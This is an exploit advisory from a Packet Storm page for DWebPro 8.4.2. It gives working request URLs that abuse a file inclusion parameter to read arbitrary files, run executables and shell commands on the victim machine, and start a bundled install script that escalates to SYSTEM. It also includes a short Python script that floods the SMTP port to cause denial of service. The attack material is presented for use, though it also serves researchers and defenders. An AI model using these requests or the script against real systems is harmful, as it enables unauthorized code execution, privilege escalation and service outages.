exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DWebPro 8.4.2 Remote Binary Execution / File Inclusion

DWebPro 8.4.2 Remote Binary Execution / File Inclusion
Posted Oct 3, 2016
Authored by Tulpa

DWebPro version 8.4.2 suffers from a file inclusion vulnerability that can trigger remote binary execution.

tags | exploit, remote, file inclusion
SHA-256 | 585c5944cbd53d6ef1625e5ba24695a08743d9b684aaeeab9a94ee352f5acfdf

DWebPro 8.4.2 Remote Binary Execution / File Inclusion

Change Mirror Download
# Exploit Title: DWebPro 8.4.2 Remote Binary Execution
# Date: 01/10/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Author twitter: @tulpa_security
# Vendor Homepage: http://www.dwebpro.com/
# Software Link: http://www.dwebpro.com/download
# Version: 8.4.2
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec

1. Description:

DWebPro is a software package used for used for distributing dynamical web sites on CD/DVD or USB drives. It
includes it's own web server called "primary web server" as well as an SMTP server. The POC below relates to the
installation of DWebPro itself however it is conceivable that the vulnerability could be leveraged within certain
contexts from a CD/DVD or USB drive. Dependent on the client configuration this vulnerability could be exploited
remotely and/or locally. The SMTP server of DWebPro is also extremely susceptible to DOS attacks.

2. Remote Binary Execution and Local File Inclusion Proof of Concept

When browsing to the demo site installed with DWebPro you will find hyperlinks to various resources located on the
local machine. One such example is "http://127.0.0.1:8080/dwebpro/start?file=C:\DWebPro\deploy\..\help\english
\dwebpro.chm". Any file can be accessed on the vulnerable machine by simply replacing the start?file= location. It
is important to note however that when browsing to an executable file through this vulnerability, that the web server
will indeed run the application locally instead of prompting you for a download. As an example, the following will start the
calculator process on the victim machine "http://192.168.0.1:8080/dwebpro/start?file=C:\Windows\system32\calc.exe".
Calc.exe will by default execute with the same permission as the user who ran dwepro.exe initially.

Basic cmd commands can also be executed such as with "http://192.168.0.1:8080/dwebpro/start?file=ipconfig".

These privileges can be escalated to SYSTEM however by installing the application as a windows service which will
automatically run on start up. In order to initiate that installation, the attacker could take advantage of a script
which is installed by default and can be executed thanks to the LFI vulnerability. This can be accomplished by using
"http://192.168.0.1:8080/dwebpro/start?file=C:\DWebPro\service\install.bat".

3. Denial of Service Proof of Concept

#!/usr/bin/python

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.0.1',25))

evil = 'A' * 300
s.recv(1024)
s.send(evil)

s.close()

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close